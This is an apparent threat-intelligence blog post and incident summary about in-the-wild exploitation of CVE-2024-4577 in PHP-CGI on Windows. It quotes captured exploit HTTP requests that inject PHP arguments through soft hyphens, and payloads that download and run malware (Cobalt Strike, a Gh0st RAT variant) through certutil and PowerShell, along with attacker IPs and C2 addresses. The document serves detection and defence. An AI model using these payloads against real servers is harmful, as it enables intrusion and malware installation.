Full Report
Introduction It’s been almost a week since DEVCORE published the technical details of CVE-2024-4577, a remote code execution vulnerability in PHP, closely followed by watchTowr’s PoC. Rest assured, our omnipresent sensor fleet has observed some nefarious activity, and this blog post will take a closer look at the few peculiar payloads we’ve seen. Background CVE-2024-4577 is a critical argument-injection vulnerability in PHP that affects Windows deployments and leads to a remote code execution when the following conditions are met: The OS is running in a specific system locale: Traditional (Code Page 950) or Simplified (Code Page 936) Chinese Japanese (Code Page 932) and PHP executable binary - php.exe or php-cgi.exe - is copied to the CGI directory or exposed via ScriptAlias /php-cgi/ "C:/xampp/php/" directive This scenario includes all versions of XAMPP installations on Windows (XAMPP is not meant for production use by default) or Windows machine running Apache HTTP Server with the Action directive configured to map HTTP requests to a PHP-CGI executable binary, for example: AddHandler cgi-script .php Action cgi-script "/cgi-bin/php-cgi.exe" Due to the wide variety of PHP usage scenarios, it’s not entirely possible to eliminate the chance of exploitation of other locales and configurations. Vulnerable PHP versions: 8.3 PHP branches 8.0, 7, and 5 (all have reached EOL) The culprit of the vulnerability is ‘best-fit’ Windows behavior applied during Unicode processing, which in the context of PHP leads to CGI handler interpreting soft hyphen 0xAD as a regular hyphen, thus allowing for the injection of command-line arguments in the HTTP request - for example -d allow_url_include=1 -d auto_prepend_file=php://input followed by PHP code that gets executed: GET /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 ... ?php echo "CVE-2024-4577"; ?> In conclusion of this part, two quotes. Orange Tsai, the author of the original research: This vulnerability is incredibly simple, but that’s also what makes it interesting. Who would have thought that a patch, which has been reviewed and proven secure for the past 12 years, could be bypassed due to a minor Windows feature? I believe this feature could lead to more potential vulnerabilities. VulnCheck, our friends and business partners: We’ve also started scanning XAMPP servers on the internet looking for exploitable servers not just version scans. The results indicate that this will not be widely exploited. XAMPP likely represents the best possibility for widespread vulnerable software (widely deployed, default install is vulnerable assuming the correct locale). But having scanned tens of thousands of Windows XAMPP hosts, we are only seeing something like a 0.50% vulnerable host rate (e.g in more simple terms for every 10,000 servers only 50 are vulnerable). Payloads Exhibit A POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 Host: IP_ADDRESS> Connection: close Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close Content-Length: 37 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux aarch64; rv:90.0) Gecko/20100101 Firefox/90.0 ?php echo md5("CVE-2024-4577"); ?> Unsurprisingly, the most popular payload is a Nuclei template. The scanner expects MD5 3f2ba4ab3b260f4c2dc61a6fac7c3e8a within the server response as a confirmation of RCE being achieved. We’ve also seen quite a few non-Nuclei variations with different PHP snippets, but the same basic idea behind them: , which seems to be a Python PoC - the echoed string translates to ten thousand li long wall /');?> certutil is a popular Windows binary that is capable of downloading files, however in this case it seemingly just reaches out to hxxp://185[.]72[.]9[.]5:80/ Exhibit B POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 Host: IP_ADDRESS> Connection: keep-alive Content-Length: 145 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko ?php $data = file_get_contents( "http:///download/x86.exe" );file_put_contents( "mskrnl.exe", $data );system( "mskrnl.exe");?> This request originated from the comrades at 62[.]204[.]41[.]128, and upon the successfully achieved RCE would fetch and execute hxxp://213[.]109[.]202[.]188:80/download/x86.exe, which appears to be a Cobalt Strike beacon that would communicate with hxxp://213[.]109[.]202[.]188/dpixel Kudos to CERT-EE for reviving the Cuckoo Sandbox 3, and maintaining its public instance: File analysis URI analysis Exhibit C POST /index.php?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input HTTP/1.1 Host: IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate, br Connection: keep-alive Content-Length: 225 User-Agent: python-requests/2.28.2 ?php system('C:\WINDOWS\system32\cmd.exe /k powershell -W Hidden powershell -command Invoke-WebRequest https://github.com/matrix52/1488/raw/main/bot.exe -UseBasicParsing -OutFile TEMP.exe ; Start TEMP.exe')?>;echo 1337; die; The attacker at 176[.]118[.]120[.]251 tried to use PowerShell and download a rather chonky (6.1MB) trojan.python/dbadur malware file hosted on GitHub. Unexpectedly, the malware crashed while running on Windows 7 sandbox: thus, the network-related part is missing from the Cuckoo report. VirusTotal’s behavioral analysis showed that the malware attempts to perform a DNS look up for le-shaw[.]gl[.]at[.]ply[.]gg, which is a subdomain of a tunneling service. We were able to decompile the sample, and locate a couple of public repositories with a very similar code: https://github.com/wodxgod/PYbot/blob/master/bot.pyw https://github.com/CirqueiraDev/KryptonC2/blob/main/src/Payload/bot.py Exhibit D POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1 Host: IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive Content-Length: 106 Content-Type: application/x-www-form-urlencoded User-Agent: python-requests/2.27.1 ?php system('certutil.exe -urlcache -f http:///system64.exe bad.exe&start bad.exe');?> Source IPs using this payload: 108[.]181[.]2[.]1 138[.]201[.]126[.]53 205[.]198[.]65[.]18 23[.]237[.]182[.]122 51[.]158[.]61[.]208 Note how the additional CLI arguments cgi.force_redirect and cgi.redirect_status_env are being injected in the URI. We’ve also observed variations of this payload with the different file names: /phps.exe phpsm.exe&start phpsm.exe');?> /phpab.exe bad.exe&start phpb.exe');?> /phpab.exe phpb.exe&start phpb.exe');?> The malware gets downloaded from hxxp://154[.]201[.]91[.]59:44557 or hxxp://147[.]50[.]253[.]109:44119, and seems to be a variant of Gh0st RAT. It reaches out to C2 146[.]19[.]100[.]7 on port 8000 upon execution: Cuckoo 3 analysis VirusTotal analysis The examples in this blog post are current as of the day of publishing (2024-06-13) We’ve yet to observe the payloads using data:// instead of php:// Where applicable, Cuckoo 3 analysis pages contain exportable file samples
Analysis Summary
# Incident Report: Mass Exploitation Attempts Targeting CVE-2024-4577 in PHP
## Executive Summary
Starting shortly after public disclosure, numerous attacker-controlled systems began actively scanning and attempting to exploit CVE-2024-4577, a critical Remote Code Execution (RCE) vulnerability in PHP installations on Windows systems, particularly affecting XAMPP environments. Observed activity ranges from automated vulnerability scanning (Nuclei) to deployment of sophisticated malware, including Cobalt Strike beacons and Gh0st RAT variants. Response actions documented involve automated detection via sensor fleets and subsequent sandbox analysis (Cuckoo) to profile attacker activity and deployed malware.
## Incident Details
- Discovery Date: Approximately one week after DEVCORE published technical details (around June 6, 2024).
- Incident Date: Ongoing scanning and exploitation observable as of the publishing date (2024-06-13).
- Affected Organization: Not applicable (Observations across the public internet by sensor fleet).
- Sector: Critical Infrastructure / Web Services (Any Windows host running vulnerable PHP/CGI configuration).
- Geography: Global (Inferred from sensor data).
## Timeline of Events
*Note: Exact times are unavailable; timeline reflects the period immediately following public disclosure.*
### Initial Access
- **Date/Time:** Shortly after June 6, 2024 (Following public disclosure by DEVCORE and PoC release by watchTowr).
- **Vector:** Remote Code Execution (RCE) via HTTP requests targeting misconfigured PHP CGI handlers on Windows systems (e.g., XAMPP deployments).
- **Details:** Attackers crafted specific HTTP requests injecting command-line arguments into the URI via the soft hyphen (%AD) substitution vulnerability.
### Lateral Movement
- **Details:** Observed payloads included techniques to download and execute secondary payloads using native Windows binaries like `certutil` or direct file download/execution commands within the PHP execution context.
- Exhibit B: Download and execute `mskrnl.exe` (Cobalt Strike beacon).
- Exhibit C: Download and execute `bot.exe` (Trojan/Malware).
- Exhibit D: Download and execute Gh0st RAT variant via `certutil.exe`.
### Data Exfiltration/Impact
- **Details:** The immediate impact is confirmed **Remote Code Execution** on vulnerable systems.
- Exhibit B suggests communication with a Cobalt Strike C2 server (`hxxp://213[.]109[.]202[.]188/dpixel`).
- Exhibit C malware attempts DNS lookup to a tunneling service (`le-shaw[.]gl[.]at[.]ply[.]gg`).
- Exhibit D malware (Gh0st RAT) communicates with C2 at `146[.]19[.]100[.]7` on port 8000.
### Detection & Response
- **Detection:** Observed by an "omnipresent sensor fleet" monitoring nefarious activity related to the published CVE. Successful exploitation attempts confirmed via specific response signatures (e.g., Nuclei expecting MD5 `3f2ba4ab3b260f4c2dc61a6fac7c3e8a`).
- **Response Actions:** Sandbox analysis employing Cuckoo Sandbox 3 was used to detonate and analyze the deployed malware samples from observed traffic (Exhibits B, C, and D).
## Attack Methodology
- **Initial Access:** RCE via Argument Injection in PHP CGI handler, exploiting Windows locale Unicode processing rules using `%AD` substitution to inject arguments (e.g., `-d allow_url_include=1 -d auto_prepend_file=php://input`).
- **Persistence:** Malware samples (Cobalt Strike, Gh0st RAT variant) imply the establishment of persistent C2 communication channels post-execution.
- **Privilege Escalation:** Not explicitly detailed, but RCE grants ability to run commands as the web server user.
- **Defense Evasion:** Use of native Windows binaries (`certutil.exe`, PowerShell) for file download helps blend with legitimate system activity (Living off the Land - LoLBins).
- **Credential Access:** Not explicitly detailed in the observed payloads.
- **Discovery:** Initial reconnaissance determined by the broad nature of automated scanning (Nuclei) and subsequent C2 communication probing.
- **Lateral Movement:** Implied through the deployment of full-featured malware like Cobalt Strike and Gh0st RAT.
- **Collection:** Malware samples analyzed showed intent for data gathering (as typical for RATs/Beacons).
- **Exfiltration:** Malware attempts to establish communication channels for command and control, likely leading to data exfiltration.
- **Impact:** Delivery and execution of secondary malware payload (backdoors/RATs) on vulnerable Windows servers.
## Impact Assessment
- **Financial:** Not calculated, but high potential cost associated with clean-up from RAT/Beacon infection.
- **Data Breach:** Potential for significant data exposure depending on the specific compromised system and the capabilities of the deployed malware (Cobalt Strike/Gh0st RAT).
- **Operational:** Disruption caused by successful deployment of remote access tools on targeted servers. The relative rarity (0.50% vulnerability rate in XAMPP scans) mitigates widespread, immediate operational impact, though highly critical for affected hosts.
- **Reputational:** Minimal public impact noted, as this describes ongoing scanning/post-disclosure observations rather than a confirmed breach of a specific entity.
## Indicators of Compromise
- **Network Indicators (Defanged):**
- C2 1: `hxxp://185[.]72[.]9[.]5:80/`
- C2 2 (Cobalt Strike): `hxxp://213[.]109[.]202[.]188:80/download/x86.exe` and C2 URI `hxxp://213[.]109[.]202[.]188/dpixel`
- C2 3 (Trojan/PYbot variant): DNS lookup to `le-shaw[.]gl[.]at[.]ply[.]gg`
- C2 4 (Gh0st RAT): `hxxp://154[.]201[.]91[.]59:44557` or `hxxp://147[.]50[.]253[.]109:44119`, C2 `146[.]19[.]100[.]7` on port 8000.
- **File Indicators:**
- **Exhibit A Confirmation String:** MD5 `3f2ba4ab3b260f4c2dc61a6fac7c3e8a`
- **Exhibit B:** `mskrnl.exe`
- **Exhibit C:** `bot.exe` (6.1MB trojan from GitHub)
- **Exhibit D:** `bad.exe`, `phps.exe`, `phpab.exe` (Gh0st RAT variants)
- **Behavioral Indicators:**
- HTTP requests containing URL-encoded soft hyphens (`%AD`) preceding PHP flags (`d`, `allow_url_include`, etc.).
- Use of `php://input` as the source for file contents via `auto_prepend_file`.
## Response Actions
- **Containment Measures:** (Implied from context, not explicitly stated as actions taken by the reporter, but necessary steps): Immediate patching/upgrading of vulnerable PHP versions, and removal of PHP executables from CGI directories if not strictly required and properly configured.
- **Eradication Steps:** Analysis of sandboxed binaries (Cobalt Strike, Gh0st RAT) to create signatures for enterprise detection and removal of confirmed malicious files (`mskrnl.exe`, `bot.exe`, etc.).
- **Recovery Actions:** Systems confirmed compromised must be forensically imaged or rebuilt if RATs are detected, and C2 command servers must be blocked at the perimeter firewall.
## Lessons Learned
- **Complexity of Security:** A small change in underlying OS behavior (Windows locale handling) can bypass years-old security patches, demonstrating that deep system context is required for robust vulnerability assessment.
- **Misconfiguration Risk:** The vulnerability is heavily reliant on common misconfigurations (XAMPP default install, improper Apache `Action` directives), highlighting the risk of non-production software in publicly accessible environments.
- **Threat Actor Swiftness:** Threat actors moved rapidly to weaponize the vulnerability immediately following public disclosure, emphasizing the need for zero-day preparedness even against vulnerabilities disclosed publicly days prior.
## Recommendations
1. **Patch/Upgrade:** Immediately update PHP installations to versions not affected by CVE-2024-4577, or ensure Windows systems are not running vulnerable locales in combination with exposed PHP CGI binaries.
2. **Configuration Review:** Review Apache configurations (`Action` directive) and ensure PHP modules are not accessible via CGI unless absolutely necessary.
3. **Restrict LoLBins:** Implement strong monitoring and restrictions on the use of native binaries like `certutil.exe` and PowerShell for network operations from non-standard parent processes (like the web server process).
4. **Automated Detection Tuning:** Tune detection systems to watch for the characteristic argument injection pattern (`%ADd`) in HTTP requests targeting PHP files.